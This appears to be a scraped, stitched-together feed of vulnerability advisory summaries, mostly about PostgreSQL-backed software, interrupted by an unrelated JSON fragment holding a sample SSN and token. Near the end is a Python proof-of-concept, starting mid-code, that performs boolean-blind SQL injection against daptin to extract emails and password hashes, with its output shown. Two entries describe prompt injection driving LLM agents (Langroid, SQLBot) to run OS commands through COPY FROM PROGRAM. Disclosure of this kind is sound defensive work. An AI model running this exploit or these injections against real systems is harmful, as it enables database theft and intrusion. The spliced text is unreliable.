Unauthenticated SQL injection in NCEAS Metacat 2.0.0 through pre-3.0.0 allows remote attackers to read, modify, and execute arbitrary statements against the PostgreSQL backend by sending crafted parameters to the /harvesterRegistration endpoint. The flaw stems from string-concatenated INSERTs in HarvesterRegistration.dbInsert() combined with a missing LDAP identity check, and because the backend permits stacked queries via Statement.executeUpdate() the injection escalates to full database compromise. No public exploit identified at time of analysis, but the CVSS 9.8 vector and trivial trigger via three reachable parameters (unit, contactEmail, documentListURL) make exploitation straightforward once the endpoint is reachable.
Privilege escalation in PostgreSQL Anonymizer versions prior to 3.1.1 allows a low-privileged database user to achieve superuser execution by embedding malicious code in a crafted JSON key-value pair that is later processed by the import_database_rules() or import_roles_rules() functions when invoked by a superuser. The attack is a stored payload that requires a superuser to trigger import of attacker-controlled rules, and no public exploit identified at time of analysis. SSVC marks exploitation as none and not automatable, but technical impact is total once the trigger condition is met.
Unauthenticated arbitrary file write in Splunk Enterprise (below 10.2.4 and 10.0.7) and Splunk Cloud Platform (below 10.4.2604.3 and 10.2.2510.14) allows remote attackers to create or truncate files on the host via an unauthenticated PostgreSQL sidecar service endpoint. The CVSS 9.8 vector (AV:N/AC:L/PR:N/UI:N) reflects trivial network exploitation, and no public exploit identified at time of analysis, though the missing-auth root cause and Splunk's high-value position in enterprise SOCs makes prompt patching warranted.
Authentication bypass in dhax/go-base Go REST API boilerplate (versions prior to commit cc82b974, merged May 17, 2026) allows remote unauthenticated attackers to forge JWT tokens for arbitrary users including administrators. The signing secret is hardcoded to the literal string 'random' in both the dev.env template and as a Viper default in cmd/serve.go, and publicly available exploit code exists in the advisory. No CISA KEV listing or EPSS data is provided, but the secret is trivially derivable from the public GitHub repository.
SQL injection in Ghidra's BSim binary-similarity component (versions before 12.1) allows authenticated remote attackers to inject arbitrary SQL via filter types that concatenate user-supplied values directly into PostgreSQL queries. Successful exploitation lets an attacker read, modify, or delete contents of the backing BSim PostgreSQL database used to store function signatures. No public exploit identified at time of analysis, though a vendor security advisory has been published by NSA on GitHub.
SQL injection in Ghidra's PostgreSQL collaboration backend (versions 11.0 through pre-12.1) allows authenticated users to escalate to PostgreSQL superuser by injecting crafted username strings into ALTER ROLE statements issued by the changePassword() method. Exploitation requires only low-privileged authenticated access to the Ghidra server, and no public exploit has been identified at time of analysis despite a working proof-of-concept being implied by the detailed vendor advisory from VulnCheck and NSA.
Authorization bypass in Mem0 self-hosted server versions through 0.2.8 allows any authenticated holder of a distributed API key to overwrite the global LLM and embedder configuration via the POST /configure endpoint, redirecting all model traffic to an attacker-controlled server. The malicious configuration is persisted to PostgreSQL and survives restarts, affecting every user and API key on the instance. Publicly available exploit code exists and a vendor patch has been released in commit ae7f406.
Cross-project embedding cache leakage in grepai (versions up to 0.35.0) allows a local low-privileged authenticated user to retrieve cached PostgreSQL embedding vectors belonging to other projects by supplying a known or predicted content_hash value to the LookupByContentHash function. The underlying flaw is a missing project_id scope in the SQL query, meaning any project's embedding vectors can be retrieved by any other authenticated caller who can supply a matching hash. No public exploitation has been confirmed via CISA KEV, but proof-of-concept exploit code has been publicly disclosed per VulDB and GitHub issue #249, and a fix PR (#250) is pending acceptance.
Privilege escalation in the AWS Advanced Go Wrapper for Amazon Aurora PostgreSQL (GlobalDatabasePlugin) allows an authenticated low-privilege RDS user to gain the privileges of another user — including rds_superuser — by planting a malicious function on an untrusted search path that executes when the targeted user connects through the wrapper. The flaw is rated CVSS 4.0 8.6 (High) and requires user interaction (the victim must initiate a connection via the wrapper), with no public exploit identified at time of analysis. A vendor patch is available in release 2026-05-26.
Privilege escalation in the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL (versions prior to 4.0.1) allows a remote authenticated low-privilege RDS user to gain the privileges of another database user - including rds_superuser - by planting a crafted function that executes when the higher-privileged user connects to the cluster through the affected wrapper. No public exploit identified at time of analysis, and the vendor (Amazon) released a fix in version 4.0.1 on 2026-05-13 that fully qualifies function calls in PostgreSQL topology detection queries to close the search-path attack surface.
SQL injection in NocoDB's Postgres formula engine exposes authenticated creators to arbitrary SQL execution via the unvalidated `direction` argument of the `ARRAYSORT(...)` formula function. All NocoDB instances on npm/nocodb versions prior to 2026.04.1 using Postgres-backed bases are affected; MySQL and SQLite backends are not. An attacker holding creator/owner-level `columnAdd` permission can inject persistent SQL that executes during column creation and re-executes on every subsequent read of the formula column, enabling confirmed denial-of-service and potentially broader data access depending on database-level permissions. No public exploit identified at time of analysis; this vulnerability is not listed in CISA KEV.
Unauthenticated arbitrary file read in PraisonAI's MCP server (pip/PraisonAI <= 4.6.39) allows remote callers to retrieve any file readable by the host user via the praisonai.workflow.show, praisonai.workflow.validate, and praisonai.deploy.validate tool handlers. The flaw is an incomplete fix for CVE-2026-44336: a hardening helper was applied to the rules.* tools but not to these adjacent workflow/deploy handlers, and the dispatcher still forwards unvalidated kwargs to handlers. Publicly available exploit code exists (working proof-of-concept in the advisory); no public exploit identified at time of analysis as a packaged exploit, but the advisory itself ships a runnable PoC.
Remote code execution in Langroid before 0.63.0 arises because its SQLChatAgent executes SQL text generated by an LLM, and that LLM is steerable through prompt injection — including indirect injection via data returned from the database into the model's context. When the agent connects with a database role holding code-execution or filesystem privileges, an attacker who shapes the agent's input can drive emission of dialect-specific primitives like PostgreSQL's COPY ... FROM PROGRAM to run OS commands on the database host. A full working proof-of-concept (Base64-smuggled COPY FROM PROGRAM running 'id') is published in the GitHub advisory; there is no entry in CISA KEV, so this reflects publicly available exploit code rather than confirmed active exploitation.
Privilege escalation in PostgreSQL Anonymizer (all versions prior to 3.1.0) allows an authenticated database user to gain superuser privileges by embedding malicious SQL code within a column identifier of a user-created table. When a superuser invokes the k-anonymity function against such a table, the injected code executes with superuser-level privileges, yielding full confidentiality, integrity, and availability impact across the database. No active exploitation has been confirmed (not in CISA KEV) and no public exploit code has been identified at time of analysis, though SSVC rates technical impact as total due to the complete privilege escalation outcome.
Remote code execution in Twenty CRM versions 1.7.7 through 1.16.7 allows authenticated users to execute arbitrary OS commands on the database server by chaining SQL injection in the REST API groupBy endpoint with PostgreSQL's COPY TO PROGRAM functionality. The unsanitized timeZone parameter is interpolated directly into raw SQL via JavaScript template literals, and exploitation succeeds whenever the application's Postgres role holds superuser privileges. Publicly available exploit code exists per SSVC, though EPSS scoring (0.15%) suggests exploitation activity has not yet become widespread.
Supply-chain compromise of SAP's Cloud Application Programming (CAP) Node.js database packages, where trojanized versions @cap-js/sqlite@2.2.2, @cap-js/postgres@2.2.2, and @cap-js/db-service@2.10.1 were published to npm on April 29, 2026, harvesting all local credentials (npm tokens, cloud keys, SSH keys, GitHub PATs) and attempting worm-like self-propagation. Any developer or CI pipeline that installed these versions must treat every credential on the affected machine as compromised. Rated CVSS 4.0 9.3 (Critical); EPSS is low (0.03%) and it is not in CISA KEV, but the malicious code was itself actively distributed via npm — a 'mini Shai-Hulud' style attack.
Chunk-smuggling in libpng-apng's push-mode APNG parser allows a remote unauthenticated attacker to cause integrity violations and availability disruption when a victim processes a specially crafted APNG file. The flaw - classified under CWE-436 (Interpretation Conflict) - stems from incorrect sequencing of CRC finalization and frame sequence number validation for fcTL and fdAT chunks in pngpread.c, enabling maliciously ordered chunk boundaries to bypass expected parser state transitions. No public exploit code exists at time of analysis and this vulnerability is not listed in the CISA KEV catalog; however, it represents a meaningful risk for any image-processing pipeline or application accepting user-supplied APNG data from untrusted sources.
Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.
Authenticated users in Mathesar 0.2.0 through 0.9.x can access metadata for PostgreSQL databases where they lack collaborator privileges, due to missing authorization checks in four API methods (collaborators.list, tables.metadata.list, explorations.list, forms.list). Exposed data includes table schemas, saved explorations, form configurations, and critically, public form submission tokens that grant unauthorized database write access under the form's PostgreSQL role. Fixed in version 0.10.0. CVSS 5.3 (Medium) reflects network-accessible, low-complexity exploitation requiring only basic authentication. No public exploit code or active exploitation detected (EPSS data unavailable, not in CISA KEV).
Broken access control in Mathesar 0.2.0 through 0.9.x allows authenticated users to read, modify, or delete saved explorations (database query definitions) in databases where they lack collaborator privileges. Exploitation requires only a valid user account and knowledge of an exploration ID - easily guessed or enumerated. Fixed in version 0.10.0. No public exploit identified at time of analysis, with EPSS data not available for this recently disclosed vulnerability.
Budibase servers before version 3.38.1 allow any authenticated application user to modify datasource connection parameters through the REST API endpoint PUT /api/datasources/:datasourceId, which requires only basic TABLE/READ permissions instead of builder-level access. This authorization bypass enables attackers with minimal BASIC role privileges to redirect PostgreSQL, MySQL, MongoDB, or REST datasources to arbitrary hosts and ports, creating server-side request forgery (SSRF) conditions that bypass existing HTTP-layer protections for SQL driver connections. The vulnerability has been assigned CVSS 8.8 (High) and is fixed in Budibase 3.38.1.
Local privilege escalation in Rapid7 Metasploit Pro allows unprivileged Windows users to achieve SYSTEM-level execution via OpenSSL configuration file hijacking. The metasploitPostgreSQL service loads openssl.cnf from a non-existent directory writable by standard users, enabling arbitrary command execution with SYSTEM privileges. Rated CVSS 8.5 (High) with proof-of-concept exploitation status (E:P). EPSS data not yet available. Not currently listed in CISA KEV catalog, suggesting vendor-disclosed rather than observed in-the-wild exploitation at time of analysis.
SQL injection in Marten's PostgreSQL full-text search APIs allows remote unauthenticated attackers to execute arbitrary database commands when applications pass user-controlled input to the regConfig parameter. The vulnerability affects all five search method overloads (SearchAsync, PlainTextSearchAsync, PhraseSearchAsync, WebStyleSearchAsync, PrefixSearchAsync) where the regConfig parameter is interpolated directly into SQL without validation. Confirmed exploit payloads demonstrate time-based blind extraction, information disclosure via SELECT statements, and DDL execution including table drops. Vendor-released patch available in Marten 8.37.0 via GitHub PR #4343. No public exploit identified at time of analysis, though the advisory includes working proof-of-concept payloads for all affected methods.
SQL injection in n8n workflow automation platform allows an attacker with write access to a connected git repository to execute arbitrary SQL against the internal PostgreSQL database when an administrator performs a Source Control Pull. The flaw stems from unsafe handling of column names within Data Table JSON files imported during sync. No public exploit identified at time of analysis, and EPSS exploitation probability is very low at 0.04%.
SQL injection in PostgreSQL logical replication ALTER SUBSCRIPTION REFRESH PUBLICATION allows authenticated local or network users with table creation privileges to execute arbitrary SQL queries with the publication subscriber's credentials. The attack is deferred until the next REFRESH PUBLICATION command is executed, requiring user interaction or scheduled maintenance. PostgreSQL 16.x, 17.x, and 18.x versions prior to 16.14, 17.10, and 18.4 respectively are vulnerable; earlier versions are unaffected. No public exploit code or active exploitation has been identified.
Stack buffer overflow in PostgreSQL's refint module allows low-privileged database users to execute arbitrary code as the database operating system user across all supported versions before 14.23, 15.18, 16.14, 17.10, and 18.4. The vulnerability enables two distinct attack paths: direct stack overflow leading to OS-level code execution, and SQL injection when applications expose user-controlled columns configured as refint cascade primary keys. With CVSS 8.8 (AV:N/AC:L/PR:L) and network-based exploitation requiring only low-privilege database credentials, this represents a critical privilege escalation risk for PostgreSQL deployments. No active exploitation (CISA KEV) or public POC identified at time of analysis.
Buffer over-read in PostgreSQL 18.0 through 18.3 allows authenticated table maintainers to infer sensitive memory contents by exploiting mismatched array lengths in the pg_restore_attribute_stats() function during query planning. The vulnerability requires authenticated database access and table maintenance privileges but enables information disclosure without modifying data or causing service disruption.
Denial of service in PostgreSQL allows remote unauthenticated attackers to crash the database server via recursive SSL/GSS negotiation when connecting to AF_UNIX or TCP sockets (if SSL and GSS are both disabled). Affects all PostgreSQL versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. No active exploitation confirmed (not in CISA KEV). Vendor-released patches available across all supported major versions. EPSS data not available, but CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates high availability impact with low barrier to exploitation.
Timing-channel attack in PostgreSQL MD5 password authentication enables remote unauthenticated attackers to extract user credentials through statistical analysis of authentication response times, affecting versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. The vulnerability exploits variable-time comparison operations during MD5 password hash verification, but does not impact the default scram-sha-256 authentication method. Databases migrated from PostgreSQL 13 or earlier may retain MD5-hashed passwords and remain vulnerable despite running newer versions.
PostgreSQL libpq client library allows malicious server superusers to execute arbitrary code on connecting clients by overwriting stack buffers via unbounded responses to PQfn() calls. The vulnerability affects lo_export(), lo_read(), lo_lseek64(), and lo_tell64() functions used by psql and pg_dump utilities. A compromised or malicious PostgreSQL server can exploit clients running these common administrative tools during routine operations like database backups or large object exports. EPSS and KEV data not available for this recent CVE. CVSS 8.8 reflects the network attack vector with user interaction requirement (connecting to malicious server).
SQL injection in PostgreSQL's pg_createsubscriber utility escalates privileges from pg_create_subscription to superuser, enabling arbitrary SQL execution. Affects PostgreSQL versions 17.0-17.9 and 18.0-18.3; exploitation requires high-privilege access (pg_create_subscription rights) but occurs remotely without additional complexity. Attack triggers when pg_createsubscriber next executes. Fixed in PostgreSQL 18.4 and 17.10. No CISA KEV listing or public exploit identified at time of analysis, but the technical simplicity (AC:L) and privilege escalation nature present moderate risk for multi-tenant or hosted PostgreSQL environments where subscription management permissions are delegated.
Symlink following vulnerabilities in PostgreSQL pg_basebackup and pg_rewind enable database superusers to overwrite arbitrary files on the destination server's filesystem, leading to local OS account takeover. Exploitation requires a malicious origin database superuser convincing an administrator to run these backup/replication tools (UI:R in CVSS), with practical impact limited to scenarios where database files are transferred between systems or snapshotted before server restart. No public exploit identified at time of analysis. CVSS 8.8 reflects theoretical severity, but real-world risk depends on specific operational workflows involving backup file transfers across trust boundaries.
Format string vulnerability in PostgreSQL timeofday() function allows authenticated remote attackers to read arbitrary server memory by supplying crafted timezone values. Affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. The vulnerability enables information disclosure of sensitive data stored in process memory without code execution or data modification capabilities.
Remote code execution in PostgreSQL (versions 14.x-18.x) allows authenticated database users to execute arbitrary code as the database operating system user via integer wraparound vulnerabilities in multiple server features. By passing gigabyte-scale inputs to affected database functions, attackers trigger allocation undersizing that leads to out-of-bounds writes. No active exploitation confirmed (not in CISA KEV), but CVSS 8.8 with network vector and low complexity indicates high exploitability once technical details become public. EPSS data not available at time of analysis.
Missing authorization in PostgreSQL CREATE TYPE allows authenticated users to hijack search_path resolution and force other database users to execute arbitrary SQL functions chosen by the attacker. An authenticated attacker can create a malicious user-defined type in a schema that appears earlier in a victim's search_path than legitimate extension or system types, causing the victim's queries to execute attacker-controlled functions instead of intended ones. This affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. While CVSS 5.4 is moderate, the attack requires authenticated database access and carries real risk in multi-tenant or shared PostgreSQL environments where privilege escalation or lateral movement is the goal.
SQL injection in SOGo versions prior to 5.12.7 allows authenticated users to inject arbitrary SQL when changing their password, provided the deployment uses PostgreSQL or MariaDB as the user backend and stores cleartext passwords. The flaw resides in the changePasswordForLogin routine where the new password value is interpolated directly into an UPDATE statement (c_password = '%@'). No public exploit identified at time of analysis, EPSS is very low (0.03%), and SSVC marks exploitation as 'none' - but the patched upstream code (PR #379, fixed in 5.12.7) confirms the vulnerability.
SQL injection in Alinto SOGo versions prior to 5.12.7 allows authenticated remote attackers to manipulate database queries when the groupware is deployed against a PostgreSQL backend. The flaw stems from improper quoting in the SQLSource authentication and contact-lookup paths, which an attacker can leverage to read or modify data with high confidentiality and integrity impact. No public exploit identified at time of analysis and EPSS is very low (0.03%), but a vendor patch and upstream code fix are available.
SQL injection in the Elixir postgrex library allows local attackers with control over PostgreSQL LISTEN/UNLISTEN channel names to execute arbitrary SQL commands including DDL and DML operations. The Postgrex.Notifications module (versions 0.16.0 through 0.22.1) fails to escape double-quote characters in channel arguments, enabling attackers to break out of quoted identifiers and chain multi-statement payloads such as DROP TABLE commands. Vendor patch available in version 0.22.2 per GitHub advisory GHSA-r73h-97w8-m54h. No public exploit code or CISA KEV listing identified at time of analysis, though the technical details and patch diff are publicly disclosed.
Prior to 2025-11-03, well-intended users of Terraform or REST API for Google Cloud AlloyDB for PostgreSQL could have created clusters with an insecure default password which could have been exploited by a remote attacker to gain full administrative access to the database. Exploitation required network access to the AlloyDB cluster and was limited to Terraform or the REST API, as other clients blocked it.
{ "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } }
Privilege escalation and OS command execution in CloudNativePG (CNPG) versions prior to 1.28.3 and 1.29.1 allow low-privileged PostgreSQL roles to gain superuser access and execute arbitrary commands inside the primary database pod. The metrics exporter connects as the postgres superuser and only demotes via SET ROLE, leaving session_user as superuser; an attacker who owns a database (including the default `app` role) can shadow unqualified identifiers like `current_database()` referenced in the stock `default-monitoring.yaml`, triggering the chain on the next scrape (≤30s). No public exploit identified at time of analysis, but the vulnerability is highly impactful (CVSS 9.4) and affects default deployments without custom metrics.
SQL injection in pgAdmin 4 Maintenance Tool allows authenticated users with tools_maintenance permission to execute arbitrary SQL and escalate to operating-system command execution on PostgreSQL database hosts. Four JSON fields (buffer_usage_limit, vacuum_parallel, vacuum_index_cleanup, reindex_tablespace) are concatenated unsafely into VACUUM/ANALYZE/REINDEX commands passed to psql. Attackers can break out of option syntax, inject SQL statements, and leverage PostgreSQL's COPY ... TO PROGRAM to achieve OS-level code execution. Fixed in version 9.15 via server-side allow-listing and proper input sanitization using qtIdent filter. EPSS data not available; no public exploit identified at time of analysis.
Stored cross-site scripting (XSS) in pgAdmin 4 before version 9.15 allows authenticated administrators to execute arbitrary JavaScript in the browsers of other pgAdmin users by crafting malicious PostgreSQL object names (databases, schemas, tables, columns) that are rendered unsafely via innerHTML in the Browser Tree and Explain Visualizer modules. The vulnerability requires administrator privileges and user interaction (navigation to or EXPLAIN execution over the malicious object), limiting real-world exploitation scope despite the network attack vector.
SQL injection in MikroORM versions ≤7.0.13 (v7) and ≤6.6.13 (v6) allows authenticated attackers to execute arbitrary SQL queries by injecting malicious characters into schema names, JSON property filters, or query builder keys. The vulnerability stems from improper escaping of dialect-specific quote characters in identifier-quoting and JSON-path functions. Multi-tenant applications are at heightened risk of cross-tenant data leakage. Vendor-released patches are available: upgrade to 7.0.14 (v7) or 6.6.14 (v6). No public exploit identified at time of analysis, though the vulnerability was discovered during internal security review by the project maintainer.
SQL injection vulnerability in pgx (Go PostgreSQL driver) prior to version 5.9.2 allows authenticated attackers to manipulate queries when the non-default simple protocol is used in conjunction with dollar-quoted string literals containing attacker-controlled placeholder-like text. The vulnerability requires specific configuration (simple protocol mode enabled) and precise SQL structure (dollar-quoted strings with embedded placeholder syntax), making exploitation unlikely in typical deployments but possible in applications explicitly using QueryExecModeSimpleProtocol.
SQL injection in PraisonAI's multi-backend conversation storage system allows authenticated attackers to execute arbitrary SQL commands. The incomplete fix for CVE-2026-40315 validated input only in SQLiteConversationStore, leaving nine other database backends (MySQL, PostgreSQL, Turso, SingleStore, Supabase, SurrealDB, and their async variants) vulnerable to f-string SQL injection via unvalidated table_prefix and schema parameters. 52 injection points exist across the codebase. Exploitable in multi-tenant deployments or API-driven configurations where table_prefix is derived from external input. Patches released in praisonai 4.6.9 and praisonaiagents 1.6.9 address all affected backends. EPSS and KEV data unavailable; no public POC confirmed at time of analysis.
{"Content-Type": "application/json"}) try: return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) except urllib.request.HTTPError as e: return json.loads(e.read(50_000)) def token(): post("/action/user_account/signup", {"attributes": { "name": "poc", "email": "poc@test.com", "password": "adminadmin", "passwordConfirm": "adminadmin"}}) body = post("/action/user_account/signin", {"attributes": { "email": "poc@test.com", "password": "adminadmin"}}) return next(i["Attributes"]["value"] for i in body if i.get("ResponseType") == "client.store.set") def rows(col, jwt): q = urllib.parse.urlencode({"query": json.dumps( [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])}) req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5", headers={"Authorization": "Bearer " + jwt}) d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) return len(d.get("data", [])) def oracle(expr, jwt): col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id" return rows(col, jwt) > 0 def extract_int(sql, jwt, hi=200): lo = 0 while lo < hi: mid = (lo + hi + 1) // 2 if oracle(f"({sql}) >= {mid}", jwt): lo = mid else: hi = mid - 1 return lo def extract_str(sql, jwt, maxlen=80): n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen) s = "" for _ in range(n): lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 pfx = s.replace("'", "''") expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})" if oracle(expr, jwt): lo = mid + 1 else: hi = mid s += chr(lo) return s jwt = token() print("baseline :", rows("reference_id", jwt), "rows") print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows") jwt = token() print("sqlite_master table count:", extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80)) print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt)) pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1", jwt, maxlen=40) print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace")) ``` **Output** (measured on commit `5d32142`, SQLite, macOS arm64): ``` baseline : 0 rows tautology: 5 rows sqlite_master table count: 57 email (row 1): guest@cms.go pw hash prefix: $2a$11$W7vO9oOPzpf7u ``` --- **Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required. **What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.
SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL against the PostgreSQL metadata database when the postgres_meta plugin is configured. The vulnerability exists in FilterEngine.create_postgres_query where attacker-controlled filter parameters are interpolated directly into raw SQL via Python str.format. Exploitation enables complete database compromise including extraction of authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and session hijacking. Remote code execution is possible via PostgreSQL COPY...FROM PROGRAM if database privileges permit. CVSS 9.9 (Critical) reflects the scope change and cascading impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, but attack complexity is low (AC:L) requiring only basic authenticated access.
SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.
Prompt injection in SQLBot 1.7.0 and earlier allows authenticated attackers to execute arbitrary SQL statements through the Text2SQL chat interface, escalating to remote code execution when connected to PostgreSQL databases via COPY FROM PROGRAM. The vulnerability stems from unsanitized user input being directly concatenated into LLM prompts, with resulting SQL executed without validation. CVSS 9.4 (Critical) reflects network-based attack with low complexity requiring only low-privilege authentication. SSVC framework confirms proof-of-concept availability and total technical impact, though exploitation is not fully automatable. Vendor-released patch 1.7.1 addresses the issue.
Authorization bypass in CKAN's datastore_search_sql function allows unauthenticated attackers to access private DataStore resources and extract PostgreSQL system information. CKAN versions prior to 2.10.10 and 2.11.0-2.11.4 are affected. The vulnerability exists in a feature that is disabled by default but can be enabled via configuration, limiting baseline exposure but creating significant risk for deployments that enable SQL search functionality.
A vulnerability in `datastore_search_sql` allowed attackers to inject SQL in order to gain access to private resources and PostgreSQL system information. The issue has been patched in CKAN 2.10.10 and CKAN 2.11.5 Disable the DataStore SQL search (`ckan.datastore.sqlsearch.enabled = false`). Note that the SQL search is disabled by default. As stated in the [documentation](https://docs.ckan.org/en/2.11/maintaining/configuration.html#ckan-datastore-sqlsearch-enabled), this action function has protections that offer some safety but are not designed to prevent all types of abuse. Depending on the sensitivity of private data in a project's DataStore and the likelihood of abuse of a consuming site, a developer may choose to disable this action function or restrict its use with a [`IAuthFunctions`](https://docs.ckan.org/en/2.11/extensions/plugin-interfaces.html#ckan.plugins.interfaces.IAuthFunctions) plugin. * Reported by Arvin Shivram of Brutecat Security
pgjdbc is an open source postgresql JDBC Driver. From version 42.2.0 to before version 42.7.11, pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication. A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count. With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail. A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools. In affected versions, loginTimeout did not fully mitigate this problem. When loginTimeout expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation. This issue has been patched in version 42.7.11.
Remote code execution in H2O-3 versions 3.46.0.9 and earlier allows unauthenticated attackers to execute arbitrary code via the /99/ImportSQLTable REST API by abusing PostgreSQL JDBC driver parameters that bypass an incomplete MySQL-only parameter blacklist. No active exploitation is recorded in CISA KEV and EPSS is low (0.19%), but a vendor patch is available and SSVC marks exploitation status as POC, indicating proof-of-concept-grade attacker capability against a network-reachable endpoint.